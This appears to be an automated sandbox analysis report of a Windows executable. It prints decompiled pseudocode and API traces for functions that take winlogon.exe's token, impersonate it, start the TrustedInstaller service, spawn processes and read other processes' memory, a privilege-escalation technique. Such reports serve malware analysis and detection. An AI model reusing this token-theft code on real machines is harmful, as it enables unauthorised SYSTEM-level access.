                                                                                      					memset( &_v546, 0, 0x208);
                                                                                      					_v1076 = 0;
                                                                                      					memset( &_v1074, 0, 0x208);
                                                                                      					E00404C3C( &_v548);
                                                                                      					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
                                                                                      					_t151 = wcslen(??);
                                                                                      					_t10 = wcslen( &_v548) + 1; // 0x1
                                                                                      					_t159 = _t151 + _t10 - 0x104;
                                                                                      					if(_t151 + _t10 >= 0x104) {
                                                                                      						_v1076 = 0;
                                                                                      					} else {
                                                                                      						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
                                                                                      					}
                                                                                      					_v8 = 0;
                                                                                      					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
                                                                                      					L14:
                                                                                      					_t160 = _t105;
                                                                                      					_v12 = _t105;
                                                                                      					L15:
                                                                                      					if(_t160 == 0) {
                                                                                      						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
                                                                                      							_v12 = GetLastError();
                                                                                      						}
                                                                                      						CloseHandle(_v8);
                                                                                      					}
                                                                                      					L44:
                                                                                      					return _v12;
                                                                                      				}
                                                                                      			}


































                                                                                      0x0040209e
                                                                                      0x004020a1
                                                                                      0x00402119
                                                                                      0x00402119
                                                                                      0x0040211b
                                                                                      0x0040211e
                                                                                      0x0040211e
                                                                                      0x00402149
                                                                                      0x00402151
                                                                                      0x00402151
                                                                                      0x00402157
                                                                                      0x00402157
                                                                                      0x004022cb
                                                                                      0x004022d2
                                                                                      0x004022d2

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040201D
                                                                                      • memset.MSVCRT ref: 00402035
                                                                                        • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                        • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                      • wcslen.MSVCRT ref: 00402050
                                                                                      • wcslen.MSVCRT ref: 0040205F
                                                                                      • wcslen.MSVCRT ref: 004020B4
                                                                                      • _wtoi.MSVCRT ref: 004020D7
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
                                                                                      • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
                                                                                      • RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7
                                                                                        • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                        • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                        • Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
                                                                                        • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
                                                                                        • Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
                                                                                        • Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
                                                                                        • Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                        • Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                        • Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                        • Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                        • Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                        • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                        • Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                      • wcschr.MSVCRT ref: 00402259
                                                                                      • CreateProcessW.KERNEL32 ref: 004022B8
                                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 004022C2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
                                                                                      • String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
                                                                                      • API String ID: 3201562063-2355939583
                                                                                      • Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                      • Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
                                                                                      • Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
                                                                                      • Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 93%
                                                                                      			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                      				void* _v8;
                                                                                      				void* _v12;
                                                                                      				char _v16;
                                                                                      				char _v24;
                                                                                      				char _v32;
                                                                                      				char _v40;
                                                                                      				char _v48;
                                                                                      				intOrPtr _v52;
                                                                                      				char _v576;
                                                                                      				long _v580;
                                                                                      				intOrPtr _v1112;
                                                                                      				long _v1128;
                                                                                      				void _v1132;
                                                                                      				void* _v1136;
                                                                                      				void _v1658;
                                                                                      				char _v1660;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* _t41;
                                                                                      				long _t49;
                                                                                      				void* _t50;
                                                                                      				intOrPtr* _t66;
                                                                                      				struct HINSTANCE__* _t68;
                                                                                      				void* _t71;
                                                                                      				void* _t83;
                                                                                      				void* _t84;
                                                                                      				void* _t85;
                                                                                      
                                                                                      				_t78 = _a4;
                                                                                      				E004099D4(_a4 + 0x28);
                                                                                      				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                      				_v12 = _t41;
                                                                                      				memset( &_v1132, 0, 0x228);
                                                                                      				_t84 = _t83 + 0xc;
                                                                                      				_v1136 = 0x22c;
                                                                                      				Process32FirstW(_v12,  &_v1136); // executed
                                                                                      				while(Process32NextW(_v12,  &_v1136) != 0) {
                                                                                      					E004090AF( &_v580);
                                                                                      					_t49 = _v1128;
                                                                                      					_v580 = _t49;
                                                                                      					_v52 = _v1112;
                                                                                      					_t50 = OpenProcess(0x410, 0, _t49);
                                                                                      					_v8 = _t50;
                                                                                      					if(_t50 != 0) {
                                                                                      						L4:
                                                                                      						_v1660 = 0;
                                                                                      						memset( &_v1658, 0, 0x208);
                                                                                      						_t85 = _t84 + 0xc;
                                                                                      						E004098F9(_t78, _v8,  &_v1660);
                                                                                      						if(_v1660 != 0) {
                                                                                      							L10:
                                                                                      							E0040920A( &_v576,  &_v1660);
                                                                                      							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                      							_t84 = _t85 + 0x14;
                                                                                      							CloseHandle(_v8);
                                                                                      							_t78 = _a4;
                                                                                      							L11:
                                                                                      							E004099ED(_t78 + 0x28,  &_v580);
                                                                                      							continue;
                                                                                      						}
                                                                                      						_v16 = 0x104;
                                                                                      						if( *0x41c8e0 == 0) {
                                                                                      							_t68 = GetModuleHandleW(L"kernel32.dll");
                                                                                      							if(_t68 != 0) {
                                                                                      								 *0x41c8e0 = 1;
                                                                                      								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
                                                                                      							}
                                                                                      						}
                                                                                      						_t66 =  *0x41c8e4;
                                                                                      						if(_t66 != 0) {
                                                                                      							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
                                                                                      						}
                                                                                      						goto L10;
                                                                                      					}
                                                                                      					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					_t71 = OpenProcess(0x1000, 0, _v580);
                                                                                      					_v8 = _t71;
                                                                                      					if(_t71 == 0) {
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					goto L4;
                                                                                      				}
                                                                                      				return CloseHandle(_v12);
                                                                                      			}

                                                                                      APIs
                                                                                        • Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB
                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                      • memset.MSVCRT ref: 0040962E
                                                                                      • Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
                                                                                      • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
                                                                                      • memset.MSVCRT ref: 004096C6
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
                                                                                      • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
                                                                                      • Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                      • CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                      • API String ID: 239888749-1740548384
                                                                                      • Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                      • Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
                                                                                      • Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
                                                                                      • Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00409921(struct HINSTANCE__** __esi) {
                                                                                      				void* _t6;
                                                                                      				struct HINSTANCE__* _t7;
                                                                                      				_Unknown_base(*)()* _t12;
                                                                                      				CHAR* _t13;
                                                                                      				intOrPtr* _t17;
                                                                                      
                                                                                      				if( *__esi == 0) {
                                                                                      					_t7 = E00405436(L"psapi.dll"); // executed
                                                                                      					 *_t17 = "GetModuleBaseNameW";
                                                                                      					 *__esi = _t7;
                                                                                      					__esi[1] = GetProcAddress(_t7, _t13);
                                                                                      					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
                                                                                      					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
                                                                                      					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
                                                                                      					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
                                                                                      					__esi[3] = _t12;
                                                                                      					return _t12;
                                                                                      				}
                                                                                      				return _t6;
                                                                                      			}

                                                                                      APIs
                                                                                        • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                        • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                        • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                      • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$memsetwcscat
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                      • API String ID: 1529661771-70141382
                                                                                      • Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                      • Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
                                                                                      • Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
                                                                                      • Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                      • String ID:
                                                                                      • API String ID: 2827331108-0
                                                                                      • Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                      • Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
                                                                                      • Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
                                                                                      • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 80%
                                                                                      			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
                                                                                      				long _v8;
                                                                                      				int _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				int _v20;
                                                                                      				int _v24;
                                                                                      				char _v28;
                                                                                      				void _v538;
                                                                                      				char _v540;
                                                                                      				int _v548;
                                                                                      				char _v564;
                                                                                      				char _v22292;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* _t37;
                                                                                      				int _t43;
                                                                                      				int _t45;
                                                                                      				void* _t48;
                                                                                      				void* _t56;
                                                                                      				signed int _t57;
                                                                                      				long _t61;
                                                                                      				void* _t67;
                                                                                      				long _t69;
                                                                                      				void* _t70;
                                                                                      				void* _t72;
                                                                                      				void* _t74;
                                                                                      				void* _t76;
                                                                                      
                                                                                      				_t67 = __edx;
                                                                                      				E0040B550(0x5714, __ecx);
                                                                                      				_t37 = OpenProcess(0x10, 0, _a16);
                                                                                      				_t82 = _t37;
                                                                                      				_a16 = _t37;
                                                                                      				if(_t37 == 0) {
                                                                                      					_t69 = GetLastError();
                                                                                      				} else {
                                                                                      					_t72 =  &_v22292;
                                                                                      					E0040171F(_t72, _t82);
                                                                                      					_v8 = 0;
                                                                                      					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
                                                                                      					if(_t43 == 0) {
                                                                                      						_t69 = GetLastError();
                                                                                      					} else {
                                                                                      						_t48 = E00405642( &_v564);
                                                                                      						_t74 = _v548;
                                                                                      						_t70 = _t48;
                                                                                      						_a12 = _t74;
                                                                                      						_v540 = 0;
                                                                                      						memset( &_v538, 0, 0x1fe);
                                                                                      						asm("cdq");
                                                                                      						_push(_t67);
                                                                                      						_push(_t74);
                                                                                      						_push(_t70);
                                                                                      						_push(L"%d  %I64x");
                                                                                      						_push(0xff);
                                                                                      						_push( &_v540);
                                                                                      						L0040B1EC();
                                                                                      						_v548 = 0;
                                                                                      						E004055D1( &_v540,  &_v564);
                                                                                      						_t16 = _t70 + 0xa; // 0xa
                                                                                      						_t68 = _t16;
                                                                                      						_v24 = 0;
                                                                                      						_v12 = 0;
                                                                                      						_v20 = 0;
                                                                                      						_v16 = 0x100;
                                                                                      						_v28 = 0;
                                                                                      						E0040559A( &_v28, _t16);
                                                                                      						_t76 = _v12;
                                                                                      						_t56 = 0x40c4e8;
                                                                                      						if(_t76 != 0) {
                                                                                      							_t56 = _t76;
                                                                                      						}
                                                                                      						_t26 = _t70 + 2; // 0x2
                                                                                      						_t66 = _t70 + _t26;
                                                                                      						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
                                                                                      						_t85 = _t76;
                                                                                      						if(_t76 == 0) {
                                                                                      							_t76 = 0x40c4e8;
                                                                                      						}
                                                                                      						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
                                                                                      						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
                                                                                      						_t69 = _t61;
                                                                                      						E004055D1(_t61,  &_v28);
                                                                                      					}
                                                                                      					_t45 = FindCloseChangeNotification(_a16); // executed
                                                                                      					E004055D1(_t45,  &_v564);
                                                                                      				}
                                                                                      				return _t69;
                                                                                      			}

                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                      • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                      • memset.MSVCRT ref: 00401B4A
                                                                                      • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                      • _snwprintf.MSVCRT ref: 00401B69
                                                                                        • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                        • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                      • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                      • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                      • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                                      • String ID: %d %I64x
                                                                                      • API String ID: 1126726007-2565891505
                                                                                      • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                      • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                      • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                      • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E00401F04(void* __edx, intOrPtr _a4) {
                                                                                      				int _v8;
                                                                                      				void _v538;
                                                                                      				long _v540;
                                                                                      				void _v1066;
                                                                                      				char _v1068;
                                                                                      				long _t30;
                                                                                      				int _t33;
                                                                                      				int _t39;
                                                                                      				void* _t42;
                                                                                      				void* _t45;
                                                                                      				long _t49;
                                                                                      
                                                                                      				_t45 = __edx;
                                                                                      				_v540 = 0;
                                                                                      				memset( &_v538, 0, 0x208);
                                                                                      				_v1068 = 0;
                                                                                      				memset( &_v1066, 0, 0x208);
                                                                                      				E00404C3C( &_v540);
                                                                                      				_t48 = L"winlogon.exe";
                                                                                      				_t39 = wcslen(L"winlogon.exe");
                                                                                      				_t8 = wcslen( &_v540) + 1; // 0x1
                                                                                      				_t53 = _t39 + _t8 - 0x104;
                                                                                      				_pop(_t42);
                                                                                      				if(_t39 + _t8 >= 0x104) {
                                                                                      					_v1068 = 0;
                                                                                      				} else {
                                                                                      					E00404BE4( &_v1068,  &_v540, _t48);
                                                                                      					_pop(_t42);
                                                                                      				}
                                                                                      				_v8 = 0;
                                                                                      				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
                                                                                      				_t49 = _t30;
                                                                                      				_t54 = _t49;
                                                                                      				if(_t49 == 0) {
                                                                                      					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
                                                                                      					_t33 = ImpersonateLoggedOnUser(_v8); // executed
                                                                                      					if(_t33 == 0) {
                                                                                      						_t49 = GetLastError();
                                                                                      					}
                                                                                      					CloseHandle(_v8);
                                                                                      				}
                                                                                      				return _t49;
                                                                                      			}















                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00401F27
                                                                                      • memset.MSVCRT ref: 00401F3F
                                                                                        • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                        • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                      • wcslen.MSVCRT ref: 00401F5A
                                                                                      • wcslen.MSVCRT ref: 00401F69
                                                                                      • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                        • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                        • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                      • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                      • API String ID: 3867304300-2177360481
                                                                                      • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                      • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                      • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                      • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00401306(void* _a4) {
                                                                                      				intOrPtr _v28;
                                                                                      				struct _SERVICE_STATUS _v32;
                                                                                      				void* _t5;
                                                                                      				int _t12;
                                                                                      				void* _t14;
                                                                                      
                                                                                      				_t12 = 0; // executed
                                                                                      				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
                                                                                      				_t14 = _t5;
                                                                                      				if(_t14 != 0) {
                                                                                      					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
                                                                                      						_t12 = StartServiceW(_t14, 0, 0);
                                                                                      					}
                                                                                      					CloseServiceHandle(_t14);
                                                                                      				}
                                                                                      				CloseServiceHandle(_a4);
                                                                                      				return _t12;
                                                                                      			}









                                                                                      APIs
                                                                                      • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                      • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                      • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                      • String ID: TrustedInstaller
                                                                                      • API String ID: 862991418-565535830
                                                                                      • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                      • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                      • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                      • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
                                                                                      				int _t8;
                                                                                      				struct HINSTANCE__* _t9;
                                                                                      
                                                                                      				if( *0x41c8e8 == 0) {
                                                                                      					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                                      					if(_t9 != 0) {
                                                                                      						 *0x41c8e8 = 1;
                                                                                      						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
                                                                                      					}
                                                                                      				}
                                                                                      				if( *0x41c8ec == 0) {
                                                                                      					return 0;
                                                                                      				} else {
                                                                                      					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                      					return _t8;
                                                                                      				}
                                                                                      			}






                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                      • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
